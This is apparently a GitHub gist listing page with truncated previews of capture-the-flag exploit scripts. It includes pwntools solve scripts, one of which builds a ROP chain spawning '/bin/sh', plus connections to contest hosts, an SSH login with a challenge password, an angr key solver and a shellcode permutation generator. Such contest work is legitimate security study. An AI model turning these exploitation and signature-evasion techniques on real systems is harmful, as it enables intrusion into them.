


Jonas Rudloff kokjo

kokjo / doit_serial.py
Created March 20, 2016 15:47
Exploit for serial from Codegate quals 2016
from pwn import *
# Solve script for the "serial" task (Codegate quals 2016): hands a
# precomputed product key to the binary.  Uses pwntools; the script
# continues past this preview, which is why `e` and `r` look unused here.
e = ELF("./serial")
# Remote endpoint kept for reference; as written the script runs the local binary.
#r = remote("175.119.158.133", 23232)
r = process("./serial")
# Consume the prompt before answering it -- the two tube calls below are
# order-dependent.
r.recvuntil("input product key:")
# Presumably the key emitted by the companion gen_serial.py gist; not
# verifiable from here.  NOTE(review): str literals on tube calls date this
# to Python 2 pwntools; modern releases expect bytes -- confirm before reuse.
r.sendline("615066814080")
@kokjo
kokjo / gen_serial.py
Created March 20, 2016 15:16
Product key generator for the serial task from Codegate Quals 2016
import angr
# Symbolic-execution key generator for "serial" (Codegate quals 2016) built on
# angr.  Only the state set-up is visible; exploration and solving continue
# past this preview.
# NOTE(review): `state.se` and `path_group` are old angr API names; current
# releases expose `state.solver` and a SimulationManager instead -- confirm
# against the angr version this was written for.
p = angr.Project("./serial")
# Blank state at a fixed address rather than the program entry point;
# presumably the key-check routine, but that is not shown here.
s = p.factory.blank_state(addr = 0x400CBB )
# 32 bytes of unconstrained symbolic input standing in for the product key.
serial = s.se.BVS("serial", 32*8)
s.memory.store(0x6020BA, serial) # store some symbolic memory in the bss
s.regs.rdi = 0x6020BA # let the first argument (rdi) point to it
pg = p.factory.path_group(s)
kokjo / recvfd.c
Last active April 14, 2024 06:07
Receive a file descriptor over an abstract Unix domain socket.
// compile with gcc -static -o recvfd recvfd.c
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <strings.h>
static int recv_fd(int sock){
// This function does the arcane magic recving
// file descriptors over unix domain sockets
struct msghdr msg;
kokjo / sendfd.c
Last active April 16, 2024 10:27
Send a file descriptor over an abstract unix domain socket
// compile with: gcc -static -o sendfd sendfd.c
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <strings.h>
int send_fd(int sock, int fd){
// This function does the arcane magic for sending
// file descriptors over unix domain sockets
struct msghdr msg;
kokjo / doit.py
Created July 14, 2015 09:06
Solution for johns-shuffle from polictf 2015
from pwn import *
# Solve script for johns-shuffle (polictf 2015); the chain is built here and
# the script continues past this preview.
e = ELF("./johns-shuffle")
rop = ROP(e)
command = "/bin/sh"
# Bypass the shuffling by forcing the dynamic linker to lookup the symbols again
# NOTE(review): this relies on lazy symbol binding being available at runtime;
# a binary linked with full RELRO / BIND_NOW resolves everything at load time
# and has no lazy-resolution path, which is the relevant hardening here.
rop.call(e.plt["read"]+6, [0, e.bss(), len(command)+1])
rop.call(e.plt["system"]+6, [e.bss()])
#include <stdio.h>
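/*
 * Read two pairs of hex values written as "0x..." from stdin and echo them.
 *
 * Fixes: the original printed `long` operands with "%x", a format/argument
 * width mismatch that is undefined behaviour; the operands are now
 * `unsigned long` and both scanf() and printf() use "%lx", which is the
 * strictly conforming pairing.  Each scanf() result is also checked, so a
 * short or malformed input is reported instead of echoing stale zeros.
 *
 * Returns 0 on success, 1 when fewer than four values could be parsed.
 */
int main(int argc, char **argv){
    unsigned long a = 0, b = 0, c = 0, d = 0;
    (void)argc;
    (void)argv;

    /* Both pairs must parse fully before anything is printed. */
    if (scanf("0x%lx 0x%lx", &a, &b) != 2 ||
        scanf("0x%lx 0x%lx", &c, &d) != 2) {
        fprintf(stderr, "expected four hex values of the form 0x...\n");
        return 1;
    }

    printf("a: 0x%lx b: 0x%lx c: 0x%lx d: 0x%lx\n", a, b, c, d);
    return 0;
}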
kokjo / doit_drunk.py
Created March 24, 2015 10:10
Solution for drunk from bcft
from pwn import *
from ctypes import sizeof
# Solve script for "drunk" (bcft).  Only the connection set-up is visible;
# the @MemLeak helper and the rest of the script continue past this preview.
ed = elf.datatypes  # unused in the visible part; presumably needed further down
r = remote("146.148.79.13", 55173)
# One line: a decimal count left-justified to 80 chars with NUL padding,
# followed by a packed little-endian 32-bit value.  The field layout is the
# remote service's own; not verifiable here.
r.sendline(str(3338240).ljust(80, "\x00")+p32(0x401000))
# Drain whatever the service sends back, up to the 1 s timeout.
r.recvrepeat(1)
@MemLeak
def leak(addr):
kokjo / doit_jfk.py
Created March 1, 2015 20:01
Solution for jfk from bkpctf
from pwn import *
# Solve script for jfk (bkpctf): drives an interactive shell on the challenge
# VM over ssh.  The script continues past this preview.
# NOTE(review): the password is embedded in the script as published for the
# challenge box; real credentials do not belong in a shared gist.
s = ssh("jfk", "54.152.92.112", password="jfk")
r = s.shell(tty=False)
# Block until the VM's shell prompt appears; the expected literal includes
# a leading NUL byte, so match it exactly as written.
r.recvuntil("\x00/ $ ")
log.info("VM has booted")
r.sendline("cd /home/supershm")
r.recvuntil("~ $ ")
kokjo / doit_boxxy.py
Created January 18, 2015 21:33
Solution of boxxy from GITS2015
from pwn import *
# Solve script for boxxy (GITS2015).  Only the set-up is visible; the
# script continues past this preview.
context(arch = 'i386', os = 'linux')
elf = ELF('boxxy')
rop = ROP(elf)
# Local copy of the target's libc; which build it corresponds to is not
# stated here.
libc = ELF("libc.so.6")
libc_rop = ROP(libc)
HOST = 'localhost'  # presumably consumed by a remote() call further down
kokjo / generate.py
Created January 2, 2015 22:15
proof-of-concept shellcode permutation generator
from random import sample, choice
def parse(text):
parts = {}
deps = {}
lines = text.strip().split("\n")
for line in lines:
lineid, linedeps, content = line.split(";", 2)
lineid = lineid.strip()
linedeps = map(lambda dep: dep.strip(), linedeps.strip().split(","))